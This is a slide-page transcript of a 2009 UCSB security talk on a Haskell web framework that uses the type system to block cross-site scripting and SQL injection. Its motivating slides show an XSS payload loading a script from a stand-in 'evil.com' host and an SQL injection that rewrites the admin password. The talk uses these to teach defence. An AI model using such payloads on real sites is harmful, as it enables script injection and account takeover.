Static Enforcement of Web Application Integrity William Robertson - - PowerPoint PPT Presentation

static enforcement of web application integrity
SMART_READER_LITE
LIVE PREVIEW

Static Enforcement of Web Application Integrity William Robertson - - PowerPoint PPT Presentation

Jun 23, 2023 13 likes •435 views

Static Enforcement of Web Application Integrity William Robertson and Giovanni Vigna { wkr,vigna } @cs.ucsb.edu Computer Security Group UC Santa Barbara 13 August 2009 (UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 1 / 28

slide-1
SLIDE 1

Static Enforcement of Web Application Integrity

William Robertson and Giovanni Vigna {wkr,vigna}@cs.ucsb.edu

Computer Security Group UC Santa Barbara

13 August 2009

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 1 / 28

slide-2
SLIDE 2

Web applications are...

◮ easy to develop

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 2 / 28

slide-3
SLIDE 3

Web applications are...

◮ easy to develop ◮ easy to deploy

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 2 / 28

slide-4
SLIDE 4

Web applications are...

◮ easy to develop ◮ easy to deploy ◮ easy to update

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 2 / 28

slide-5
SLIDE 5

Web applications are...

◮ easy to develop ◮ easy to deploy ◮ easy to update ◮ accessible from everywhere

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 2 / 28

slide-6
SLIDE 6

...and broken

FAA Review of Web Applications Security and Intrusion Detection in Air Traffic Control Systems Report Number: FI-2009-049 Date Issued: May 4, 2009 (UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 3 / 28

slide-7
SLIDE 7

...and broken

FAA Review of Web Applications Security and Intrusion Detection in Air Traffic Control Systems Report Number: FI-2009-049 Date Issued: May 4, 2009 (UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 3 / 28

slide-8
SLIDE 8

A pervasive problem

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 4 / 28

slide-9
SLIDE 9

Cross-site scripting

<input type="hidden" name="m" value="$var"/>

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 5 / 28

slide-10
SLIDE 10

Cross-site scripting

<input type="hidden" name="m" value="x"/>

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 5 / 28

slide-11
SLIDE 11

Cross-site scripting

<input type="hidden" name="m" value="x"/> <script src="http://evil.com/x.js"> </script> <span id="x"/>

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 5 / 28

slide-12
SLIDE 12

SQL injection

UPDATE users SET passwd=’$var’ WHERE login=’user’

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 6 / 28

slide-13
SLIDE 13

SQL injection

UPDATE users SET passwd=’l33r0y’ WHERE login=’user’

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 6 / 28

slide-14
SLIDE 14

SQL injection

UPDATE users SET passwd=’l33r0y’ WHERE login=’admin’--’ WHERE login=’user’

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 6 / 28

slide-15
SLIDE 15

Existing solutions

◮ Web application firewalls ◮ Automated static, dynamic analyses ◮ Penetration testing and code auditing

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 7 / 28

slide-16
SLIDE 16

Why are web apps vulnerable?

◮ Web documents and database queries treated as

unstructured character sequences

◮ No knowledge of structure and content at the

framework level

◮ Developers responsible for manually sanitizing

content

◮ Failure to preserve integrity of document and

database query structure

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 8 / 28

slide-17
SLIDE 17

A language-based solution

◮ Explicitly denote structure and content within

language using the type system

◮ Language is responsible for preserving application

integrity

◮ Lift burden as much as possible from the developer

◮ No testing, separate analyses, policy specifications

◮ Web application compiles → application is safe

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 9 / 28

slide-18
SLIDE 18

Framework overview

◮ Haskell-based application framework prototype ◮ Application implemented as set of functions

executing within the App monad stack

◮ HTTP requests routed to functions ◮ Functions perform computations and return

documents

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 10 / 28

slide-19
SLIDE 19

Documents

Document DocHead DocBody TitleNode LinkNode DivNode AnchorNode TextNode DivNode TextNode (UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 11 / 28

slide-20
SLIDE 20

Document nodes

data Node = TextNode { nodeText :: String } | AnchorNode { anchorAttrs :: NodeAttrs, anchorHref :: Maybe Url, ... anchorNodes :: [Node] } | DivNode { divAttrs :: NodeAttrs, divNodes :: [Node] } ...

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 12 / 28

slide-21
SLIDE 21

Document nodes

data Node = TextNode { nodeText :: String } | AnchorNode { anchorAttrs :: NodeAttrs, anchorHref :: Maybe Url, ... anchorNodes :: [Node] } | DivNode { divAttrs :: NodeAttrs, divNodes :: [Node] } ...

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 12 / 28

slide-22
SLIDE 22

Document nodes

data Node = TextNode { nodeText :: String } | AnchorNode { anchorAttrs :: NodeAttrs, anchorHref :: Maybe Url, ... anchorNodes :: [Node] } | DivNode { divAttrs :: NodeAttrs, divNodes :: [Node] } ...

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 12 / 28

slide-23
SLIDE 23

Document nodes

data Node = TextNode { nodeText :: String } | AnchorNode { anchorAttrs :: NodeAttrs, anchorHref :: Maybe Url, ... anchorNodes :: [Node] } | DivNode { divAttrs :: NodeAttrs, divNodes :: [Node] } ...

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 12 / 28

slide-24
SLIDE 24

Enforcing document integrity

◮ Type system restricts applications to constructing

Document trees

◮ f :: HttpRequest -> App Document ◮ Framework is responsible for rendering tree into text

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 13 / 28

slide-25
SLIDE 25

Document rendering

Document DocHead DocBody TitleNode LinkNode DivNode AnchorNode TextNode DivNode TextNode

<html> <head> <title>...</title> </head> <body> <div> <a href="...">...</a> </div> ... <div> </div> </body> </html>

Web Application Framework

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 14 / 28

slide-26
SLIDE 26

Node sanitization

class Render a where render :: a -> String

◮ Nodes implement Render typeclass ◮ render sanitizes data given context

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 15 / 28

slide-27
SLIDE 27

Database queries

UPDATE users SET passwd=? WHERE login=?

◮ Mechanism already exists to fix query structure –

prepared statements

◮ App monad controls access to database functions

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 16 / 28

slide-28
SLIDE 28

Database queries

UPDATE users SET passwd=? WHERE login=?

◮ Mechanism already exists to fix query structure –

prepared statements

◮ App monad controls access to database functions

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 16 / 28

slide-29
SLIDE 29

Enforcing static query integrity

IO AppIO AppState AppConfig Application

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 17 / 28

slide-30
SLIDE 30

Not all queries are static

SELECT * FROM users WHERE login IN (’admin’)

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 18 / 28

slide-31
SLIDE 31

Not all queries are static

SELECT * FROM users WHERE login IN (’admin’, ’devel’)

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 18 / 28

slide-32
SLIDE 32

Not all queries are static

SELECT * FROM users WHERE login IN (’admin’, ’devel’, ’test’)

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 18 / 28

slide-33
SLIDE 33

Enforcing dynamic query integrity

SELECT ["*"] ["users"] IN "login" SET "admin" "test" "devel" (UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 19 / 28

slide-34
SLIDE 34

Sanitization evaluation

◮ Performed control flow analysis of framework to

evaluate coverage of sanitization functions

◮ Evaluated correctness of individual sanitization

functions

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 20 / 28

slide-35
SLIDE 35

Sanitization function coverage

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 21 / 28

slide-36
SLIDE 36

Sanitization function correctness

◮ Test-driven approach to check correctness ◮ Number of invariants manually specified ◮ 1,000,000 random test cases generated using

QuickCheck

◮ Test cases for malicious examples

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 22 / 28

slide-37
SLIDE 37

Sanitization function invariants

propAttrValueSafe :: AttrValue -> Bool propAttrValueSafe input = (not $ elem ’<’ output) && (not $ elem ’>’ output) && (not $ elem ’&’ $ stripEntities output) && (not $ elem ’"’ output) where

  • utput = render input

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 23 / 28

slide-38
SLIDE 38

Performance

◮ Implemented web application using three

frameworks

◮ Haskell ◮ Pylons ◮ Tomcat

◮ Evaluated throughput and latency

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 24 / 28

slide-39
SLIDE 39

Latency

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 25 / 28

slide-40
SLIDE 40

Throughput

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 26 / 28

slide-41
SLIDE 41

Conclusions

◮ XSS and SQL injection stem from failure to enforce

integrity of documents and database queries

◮ Type system allows framework to automatically

prevent introduction of server-side vulnerabilities

◮ Prototype framework is effective at preventing

exploitation

◮ Reasonable latency and throughput performance

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 27 / 28

slide-42
SLIDE 42

(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 28 / 28